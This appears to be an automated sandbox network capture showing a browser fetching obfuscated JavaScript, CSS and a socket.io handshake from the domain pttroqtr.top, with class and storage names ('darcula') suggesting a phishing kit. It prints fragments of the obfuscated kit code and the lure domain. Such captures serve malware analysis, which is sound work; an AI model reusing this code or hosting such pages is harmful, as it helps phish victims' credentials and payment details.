                                                                                                                                                                                            2024-09-28 03:39:28 UTC16384INData Raw: 72 28 74 68 69 73 5b 27 6f 70 74 73 27 5d 5b 5f 30 78 34 63 64 38 65 63 28 30 78 32 33 64 29 5d 29 21 3d 3d 30 78 35 30 29 3f 27 3a 27 2b 74 68 69 73 5b 5f 30 78 34 63 64 38 65 63 28 30 78 32 30 66 29 5d 5b 5f 30 78 34 63 64 38 65 63 28 30 78 32 33 64 29 5d 3a 27 27 3b 7d 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 31 33 38 29 5d 28 5f 30 78 35 63 66 33 38 32 29 7b 63 6f 6e 73 74 20 5f 30 78 33 33 64 36 37 65 3d 69 74 28 5f 30 78 35 63 66 33 38 32 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 33 64 36 37 65 5b 27 6c 65 6e 67 74 68 27 5d 3f 27 3f 27 2b 5f 30 78 33 33 64 36 37 65 3a 27 27 3b 7d 7d 63 6f 6e 73 74 20 4c 65 3d 28 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 32 30 29 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 61 34 29 2b 61 31 5f 30 78 35 34 31
                                                                                                                                                                                            Data Ascii: r(this['opts'][_0x4cd8ec(0x23d)])!==0x50)?':'+this[_0x4cd8ec(0x20f)][_0x4cd8ec(0x23d)]:'';}[a1_0x54146a(0x138)](_0x5cf382){const _0x33d67e=it(_0x5cf382);return _0x33d67e['length']?'?'+_0x33d67e:'';}}const Le=(a1_0x54146a(0x220)+a1_0x54146a(0x2a4)+a1_0x541
                                                                                                                                                                                            2024-09-28 03:39:28 UTC16384INData Raw: 34 36 61 3b 66 6f 72 28 6c 65 74 20 5f 30 78 34 32 38 30 30 38 20 69 6e 20 77 5b 27 72 65 71 75 65 73 74 73 27 5d 29 77 5b 5f 30 78 32 34 34 33 36 61 28 30 78 32 64 30 29 5d 5b 5f 30 78 32 34 34 33 36 61 28 30 78 31 34 61 29 2b 27 65 72 74 79 27 5d 28 5f 30 78 34 32 38 30 30 38 29 26 26 77 5b 5f 30 78 32 34 34 33 36 61 28 30 78 32 64 30 29 5d 5b 5f 30 78 34 32 38 30 30 38 5d 5b 5f 30 78 32 34 34 33 36 61 28 30 78 32 62 38 29 5d 28 29 3b 7d 63 6f 6e 73 74 20 6e 65 3d 28 28 28 29 3d 3e 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 3d 3d 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 38 37 29 26 26 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 31 64 31 29 5d 3d 3d 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 38 37 29 3f 5f
                                                                                                                                                                                            Data Ascii: 46a;for(let _0x428008 in w['requests'])w[_0x24436a(0x2d0)][_0x24436a(0x14a)+'erty'](_0x428008)&&w[_0x24436a(0x2d0)][_0x428008][_0x24436a(0x2b8)]();}const ne=((()=>typeof Promise==a1_0x54146a(0x387)&&typeof Promise[a1_0x54146a(0x1d1)]==a1_0x54146a(0x387)?_
                                                                                                                                                                                            2024-09-28 03:39:28 UTC16384INData Raw: 34 63 64 36 30 32 28 30 78 33 62 65 29 5d 29 3b 62 72 65 61 6b 3b 7d 7d 5b 27 6f 6e 48 61 6e 64 73 68 61 6b 27 2b 27 65 27 5d 28 5f 30 78 35 62 36 62 35 30 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 66 32 64 34 3d 61 31 5f 30 78 35 34 31 34 36 61 3b 74 68 69 73 5b 5f 30 78 35 63 66 32 64 34 28 30 78 31 62 31 29 2b 27 65 64 27 5d 28 27 68 61 6e 64 73 68 61 6b 65 27 2c 5f 30 78 35 62 36 62 35 30 29 2c 74 68 69 73 5b 27 69 64 27 5d 3d 5f 30 78 35 62 36 62 35 30 5b 27 73 69 64 27 5d 2c 74 68 69 73 5b 5f 30 78 35 63 66 32 64 34 28 30 78 32 65 65 29 5d 5b 5f 30 78 35 63 66 32 64 34 28 30 78 31 34 33 29 5d 5b 5f 30 78 35 63 66 32 64 34 28 30 78 33 35 63 29 5d 3d 5f 30 78 35 62 36 62 35 30 5b 5f 30 78 35 63 66 32 64 34 28 30 78 33 35 63 29 5d 2c 74 68 69 73 5b 27 75
                                                                                                                                                                                            Data Ascii: 4cd602(0x3be)]);break;}}['onHandshak'+'e'](_0x5b6b50){const _0x5cf2d4=a1_0x54146a;this[_0x5cf2d4(0x1b1)+'ed']('handshake',_0x5b6b50),this['id']=_0x5b6b50['sid'],this[_0x5cf2d4(0x2ee)][_0x5cf2d4(0x143)][_0x5cf2d4(0x35c)]=_0x5b6b50[_0x5cf2d4(0x35c)],this['u
                                                                                                                                                                                            2024-09-28 03:39:28 UTC16384INData Raw: 78 32 65 64 29 5d 3d 6e 75 6c 6c 29 3b 7d 7d 63 6c 61 73 73 20 42 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 5f 30 78 35 63 37 35 61 31 29 7b 63 6f 6e 73 74 20 5f 30 78 31 62 38 65 37 35 3d 61 31 5f 30 78 35 34 31 34 36 61 3b 74 68 69 73 5b 27 70 61 63 6b 65 74 27 5d 3d 5f 30 78 35 63 37 35 61 31 2c 74 68 69 73 5b 5f 30 78 31 62 38 65 37 35 28 30 78 33 34 36 29 5d 3d 5b 5d 2c 74 68 69 73 5b 5f 30 78 31 62 38 65 37 35 28 30 78 32 34 65 29 5d 3d 5f 30 78 35 63 37 35 61 31 3b 7d 5b 27 74 61 6b 65 42 69 6e 61 72 79 27 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 66 64 29 5d 28 5f 30 78 32 34 63 64 35 64 29 7b 63 6f 6e 73 74 20 5f 30 78 31 36 36 65 66 61 3d 61 31 5f 30 78 35 34 31 34 36 61 3b 69 66 28 74 68 69 73 5b 5f 30 78 31 36 36 65 66 61 28 30 78 33 34
                                                                                                                                                                                            Data Ascii: x2ed)]=null);}}class Bt{constructor(_0x5c75a1){const _0x1b8e75=a1_0x54146a;this['packet']=_0x5c75a1,this[_0x1b8e75(0x346)]=[],this[_0x1b8e75(0x24e)]=_0x5c75a1;}['takeBinary'+a1_0x54146a(0x2fd)](_0x24cd5d){const _0x166efa=a1_0x54146a;if(this[_0x166efa(0x34
                                                                                                                                                                                            2024-09-28 03:39:28 UTC16384INData Raw: 36 63 35 21 3d 3d 76 6f 69 64 20 30 78 30 3f 5f 30 78 35 36 35 36 63 35 3a 30 2e 35 29 2c 74 68 69 73 5b 5f 30 78 31 31 35 33 33 61 28 30 78 32 34 62 29 5d 3d 6e 65 77 20 54 28 7b 27 6d 69 6e 27 3a 74 68 69 73 5b 5f 30 78 31 31 35 33 33 61 28 30 78 33 33 65 29 2b 5f 30 78 31 31 35 33 33 61 28 30 78 31 62 61 29 5d 28 29 2c 27 6d 61 78 27 3a 74 68 69 73 5b 5f 30 78 31 31 35 33 33 61 28 30 78 33 33 65 29 2b 27 6f 6e 44 65 6c 61 79 4d 61 78 27 5d 28 29 2c 27 6a 69 74 74 65 72 27 3a 74 68 69 73 5b 5f 30 78 31 31 35 33 33 61 28 30 78 32 34 32 29 2b 5f 30 78 31 31 35 33 33 61 28 30 78 33 34 61 29 5d 28 29 7d 29 2c 74 68 69 73 5b 5f 30 78 31 31 35 33 33 61 28 30 78 31 64 36 29 5d 28 5f 30 78 65 32 31 31 63 33 5b 5f 30 78 31 31 35 33 33 61 28 30 78 31 64 36 29 5d
                                                                                                                                                                                            Data Ascii: 6c5!==void 0x0?_0x5656c5:0.5),this[_0x11533a(0x24b)]=new T({'min':this[_0x11533a(0x33e)+_0x11533a(0x1ba)](),'max':this[_0x11533a(0x33e)+'onDelayMax'](),'jitter':this[_0x11533a(0x242)+_0x11533a(0x34a)]()}),this[_0x11533a(0x1d6)](_0xe211c3[_0x11533a(0x1d6)]
                                                                                                                                                                                            2024-09-28 03:39:28 UTC14610INData Raw: 30 78 32 62 62 29 5d 28 5f 30 78 35 36 39 64 66 65 29 3b 7d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 63 37 33 31 34 29 7b 63 6f 6e 73 74 20 5f 30 78 31 61 31 64 61 37 3d 61 31 5f 30 78 35 34 31 34 36 61 3b 63 6f 6e 73 6f 6c 65 5b 5f 30 78 31 61 31 64 61 37 28 30 78 33 34 64 29 5d 28 5f 30 78 31 63 37 33 31 34 29 2c 4d 74 28 27 67 65 74 6f 75 74 27 29 3b 7d 29 3b 63 6f 6e 73 74 20 73 3d 4a 53 4f 4e 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 61 35 29 5d 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 61 31 29 5d 28 27 5f 5f 64 61 72 63 75 6c 61 5f 27 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 31 61 62 29 29 7c 7c 27 5b 5d 27 29 3b 64 6f 63 75 6d 65 6e 74 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 31 33 31 29
                                                                                                                                                                                            Data Ascii: 0x2bb)](_0x569dfe);},function(_0x1c7314){const _0x1a1da7=a1_0x54146a;console[_0x1a1da7(0x34d)](_0x1c7314),Mt('getout');});const s=JSON[a1_0x54146a(0x3a5)](localStorage[a1_0x54146a(0x3a1)]('__darcula_'+a1_0x54146a(0x1ab))||'[]');document[a1_0x54146a(0x131)


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            29192.168.2.5497488.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:28 UTC364OUTGET /api/MC45ODQ1NjY2NzE5MzU4MDAy HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:28 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:28 GMT
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            30192.168.2.5497498.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:29 UTC364OUTGET /help/assets/0e738ae1JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:29 UTC364INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:29 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 112550
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"1b7a6-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16020INData Raw: 63 6f 6e 73 74 20 61 31 5f 30 78 35 34 31 34 36 61 3d 61 31 5f 30 78 31 61 33 33 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 35 30 31 39 61 2c 5f 30 78 34 62 64 31 65 66 29 7b 63 6f 6e 73 74 20 5f 30 78 34 61 64 31 34 66 3d 61 31 5f 30 78 31 61 33 33 2c 5f 30 78 34 66 30 39 64 66 3d 5f 30 78 31 35 30 31 39 61 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 32 33 61 65 64 36 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 63 30 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 64 32 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 65 31 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66
                                                                                                                                                                                            Data Ascii: const a1_0x54146a=a1_0x1a33;(function(_0x15019a,_0x4bd1ef){const _0x4ad14f=a1_0x1a33,_0x4f09df=_0x15019a();while(!![]){try{const _0x23aed6=parseInt(_0x4ad14f(0x1c0))/0x1*(-parseInt(_0x4ad14f(0x1d2))/0x2)+-parseInt(_0x4ad14f(0x1e1))/0x3*(parseInt(_0x4ad14f
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16384INData Raw: 72 28 74 68 69 73 5b 27 6f 70 74 73 27 5d 5b 5f 30 78 34 63 64 38 65 63 28 30 78 32 33 64 29 5d 29 21 3d 3d 30 78 35 30 29 3f 27 3a 27 2b 74 68 69 73 5b 5f 30 78 34 63 64 38 65 63 28 30 78 32 30 66 29 5d 5b 5f 30 78 34 63 64 38 65 63 28 30 78 32 33 64 29 5d 3a 27 27 3b 7d 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 31 33 38 29 5d 28 5f 30 78 35 63 66 33 38 32 29 7b 63 6f 6e 73 74 20 5f 30 78 33 33 64 36 37 65 3d 69 74 28 5f 30 78 35 63 66 33 38 32 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 33 64 36 37 65 5b 27 6c 65 6e 67 74 68 27 5d 3f 27 3f 27 2b 5f 30 78 33 33 64 36 37 65 3a 27 27 3b 7d 7d 63 6f 6e 73 74 20 4c 65 3d 28 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 32 30 29 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 61 34 29 2b 61 31 5f 30 78 35 34 31
                                                                                                                                                                                            Data Ascii: r(this['opts'][_0x4cd8ec(0x23d)])!==0x50)?':'+this[_0x4cd8ec(0x20f)][_0x4cd8ec(0x23d)]:'';}[a1_0x54146a(0x138)](_0x5cf382){const _0x33d67e=it(_0x5cf382);return _0x33d67e['length']?'?'+_0x33d67e:'';}}const Le=(a1_0x54146a(0x220)+a1_0x54146a(0x2a4)+a1_0x541
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16384INData Raw: 34 36 61 3b 66 6f 72 28 6c 65 74 20 5f 30 78 34 32 38 30 30 38 20 69 6e 20 77 5b 27 72 65 71 75 65 73 74 73 27 5d 29 77 5b 5f 30 78 32 34 34 33 36 61 28 30 78 32 64 30 29 5d 5b 5f 30 78 32 34 34 33 36 61 28 30 78 31 34 61 29 2b 27 65 72 74 79 27 5d 28 5f 30 78 34 32 38 30 30 38 29 26 26 77 5b 5f 30 78 32 34 34 33 36 61 28 30 78 32 64 30 29 5d 5b 5f 30 78 34 32 38 30 30 38 5d 5b 5f 30 78 32 34 34 33 36 61 28 30 78 32 62 38 29 5d 28 29 3b 7d 63 6f 6e 73 74 20 6e 65 3d 28 28 28 29 3d 3e 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 3d 3d 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 38 37 29 26 26 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 31 64 31 29 5d 3d 3d 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 38 37 29 3f 5f
                                                                                                                                                                                            Data Ascii: 46a;for(let _0x428008 in w['requests'])w[_0x24436a(0x2d0)][_0x24436a(0x14a)+'erty'](_0x428008)&&w[_0x24436a(0x2d0)][_0x428008][_0x24436a(0x2b8)]();}const ne=((()=>typeof Promise==a1_0x54146a(0x387)&&typeof Promise[a1_0x54146a(0x1d1)]==a1_0x54146a(0x387)?_
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16384INData Raw: 34 63 64 36 30 32 28 30 78 33 62 65 29 5d 29 3b 62 72 65 61 6b 3b 7d 7d 5b 27 6f 6e 48 61 6e 64 73 68 61 6b 27 2b 27 65 27 5d 28 5f 30 78 35 62 36 62 35 30 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 66 32 64 34 3d 61 31 5f 30 78 35 34 31 34 36 61 3b 74 68 69 73 5b 5f 30 78 35 63 66 32 64 34 28 30 78 31 62 31 29 2b 27 65 64 27 5d 28 27 68 61 6e 64 73 68 61 6b 65 27 2c 5f 30 78 35 62 36 62 35 30 29 2c 74 68 69 73 5b 27 69 64 27 5d 3d 5f 30 78 35 62 36 62 35 30 5b 27 73 69 64 27 5d 2c 74 68 69 73 5b 5f 30 78 35 63 66 32 64 34 28 30 78 32 65 65 29 5d 5b 5f 30 78 35 63 66 32 64 34 28 30 78 31 34 33 29 5d 5b 5f 30 78 35 63 66 32 64 34 28 30 78 33 35 63 29 5d 3d 5f 30 78 35 62 36 62 35 30 5b 5f 30 78 35 63 66 32 64 34 28 30 78 33 35 63 29 5d 2c 74 68 69 73 5b 27 75
                                                                                                                                                                                            Data Ascii: 4cd602(0x3be)]);break;}}['onHandshak'+'e'](_0x5b6b50){const _0x5cf2d4=a1_0x54146a;this[_0x5cf2d4(0x1b1)+'ed']('handshake',_0x5b6b50),this['id']=_0x5b6b50['sid'],this[_0x5cf2d4(0x2ee)][_0x5cf2d4(0x143)][_0x5cf2d4(0x35c)]=_0x5b6b50[_0x5cf2d4(0x35c)],this['u
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16384INData Raw: 78 32 65 64 29 5d 3d 6e 75 6c 6c 29 3b 7d 7d 63 6c 61 73 73 20 42 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 5f 30 78 35 63 37 35 61 31 29 7b 63 6f 6e 73 74 20 5f 30 78 31 62 38 65 37 35 3d 61 31 5f 30 78 35 34 31 34 36 61 3b 74 68 69 73 5b 27 70 61 63 6b 65 74 27 5d 3d 5f 30 78 35 63 37 35 61 31 2c 74 68 69 73 5b 5f 30 78 31 62 38 65 37 35 28 30 78 33 34 36 29 5d 3d 5b 5d 2c 74 68 69 73 5b 5f 30 78 31 62 38 65 37 35 28 30 78 32 34 65 29 5d 3d 5f 30 78 35 63 37 35 61 31 3b 7d 5b 27 74 61 6b 65 42 69 6e 61 72 79 27 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 66 64 29 5d 28 5f 30 78 32 34 63 64 35 64 29 7b 63 6f 6e 73 74 20 5f 30 78 31 36 36 65 66 61 3d 61 31 5f 30 78 35 34 31 34 36 61 3b 69 66 28 74 68 69 73 5b 5f 30 78 31 36 36 65 66 61 28 30 78 33 34
                                                                                                                                                                                            Data Ascii: x2ed)]=null);}}class Bt{constructor(_0x5c75a1){const _0x1b8e75=a1_0x54146a;this['packet']=_0x5c75a1,this[_0x1b8e75(0x346)]=[],this[_0x1b8e75(0x24e)]=_0x5c75a1;}['takeBinary'+a1_0x54146a(0x2fd)](_0x24cd5d){const _0x166efa=a1_0x54146a;if(this[_0x166efa(0x34
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16384INData Raw: 36 63 35 21 3d 3d 76 6f 69 64 20 30 78 30 3f 5f 30 78 35 36 35 36 63 35 3a 30 2e 35 29 2c 74 68 69 73 5b 5f 30 78 31 31 35 33 33 61 28 30 78 32 34 62 29 5d 3d 6e 65 77 20 54 28 7b 27 6d 69 6e 27 3a 74 68 69 73 5b 5f 30 78 31 31 35 33 33 61 28 30 78 33 33 65 29 2b 5f 30 78 31 31 35 33 33 61 28 30 78 31 62 61 29 5d 28 29 2c 27 6d 61 78 27 3a 74 68 69 73 5b 5f 30 78 31 31 35 33 33 61 28 30 78 33 33 65 29 2b 27 6f 6e 44 65 6c 61 79 4d 61 78 27 5d 28 29 2c 27 6a 69 74 74 65 72 27 3a 74 68 69 73 5b 5f 30 78 31 31 35 33 33 61 28 30 78 32 34 32 29 2b 5f 30 78 31 31 35 33 33 61 28 30 78 33 34 61 29 5d 28 29 7d 29 2c 74 68 69 73 5b 5f 30 78 31 31 35 33 33 61 28 30 78 31 64 36 29 5d 28 5f 30 78 65 32 31 31 63 33 5b 5f 30 78 31 31 35 33 33 61 28 30 78 31 64 36 29 5d
                                                                                                                                                                                            Data Ascii: 6c5!==void 0x0?_0x5656c5:0.5),this[_0x11533a(0x24b)]=new T({'min':this[_0x11533a(0x33e)+_0x11533a(0x1ba)](),'max':this[_0x11533a(0x33e)+'onDelayMax'](),'jitter':this[_0x11533a(0x242)+_0x11533a(0x34a)]()}),this[_0x11533a(0x1d6)](_0xe211c3[_0x11533a(0x1d6)]
                                                                                                                                                                                            2024-09-28 03:39:29 UTC14610INData Raw: 30 78 32 62 62 29 5d 28 5f 30 78 35 36 39 64 66 65 29 3b 7d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 63 37 33 31 34 29 7b 63 6f 6e 73 74 20 5f 30 78 31 61 31 64 61 37 3d 61 31 5f 30 78 35 34 31 34 36 61 3b 63 6f 6e 73 6f 6c 65 5b 5f 30 78 31 61 31 64 61 37 28 30 78 33 34 64 29 5d 28 5f 30 78 31 63 37 33 31 34 29 2c 4d 74 28 27 67 65 74 6f 75 74 27 29 3b 7d 29 3b 63 6f 6e 73 74 20 73 3d 4a 53 4f 4e 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 61 35 29 5d 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 61 31 29 5d 28 27 5f 5f 64 61 72 63 75 6c 61 5f 27 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 31 61 62 29 29 7c 7c 27 5b 5d 27 29 3b 64 6f 63 75 6d 65 6e 74 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 31 33 31 29
                                                                                                                                                                                            Data Ascii: 0x2bb)](_0x569dfe);},function(_0x1c7314){const _0x1a1da7=a1_0x54146a;console[_0x1a1da7(0x34d)](_0x1c7314),Mt('getout');});const s=JSON[a1_0x54146a(0x3a5)](localStorage[a1_0x54146a(0x3a1)]('__darcula_'+a1_0x54146a(0x1ab))||'[]');document[a1_0x54146a(0x131)


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            31192.168.2.5497508.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:29 UTC557OUTGET /help/assets/f4397cedkFGym.css HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:29 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:29 GMT
                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                            Content-Length: 400
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"190-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:29 UTC400INData Raw: 68 74 6d 6c 2c 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 69 6d 67 5b 73 72 63 3d 22 64 61 74 61 3a 2c 22 5d 2c 73 6f 75 72 63 65 5b 73 72 63 3d 22 64 61 74 61 3a 2c 22 5d 2c 2e 73 66 2d 68 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 23 64 61 72 63 75 6c 61 2d 74 65 6c 65 70 6f 72 74 2d 70 61 67 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 68 65 69 67 68 74 3a 31 30 30 64 76 68 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 7a 2d 69 6e 64 65 78 3a 31 30 7d 69 6e 70 75 74 5b 69 6e 70 75 74 6d 6f 64 65 3d 6e 75 6d 65 72 69 63 5d 2c 69 6e 70 75 74 5b 74 79 70
                                                                                                                                                                                            Data Ascii: html,body{padding:0;border:0;margin:0}img[src="data:,"],source[src="data:,"],.sf-hidden{display:none!important}#darcula-teleport-page{position:fixed;top:0;left:0;width:100vw;height:100dvh;background-color:#fff;z-index:10}input[inputmode=numeric],input[typ


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            32192.168.2.5497518.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:29 UTC554OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjaQU HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:29 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:29 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 118
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:29 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 78 5a 73 4f 58 57 77 6c 70 61 39 73 5a 68 4a 64 41 45 66 30 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                            Data Ascii: 0{"sid":"xZsOXWwlpa9sZhJdAEf0","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


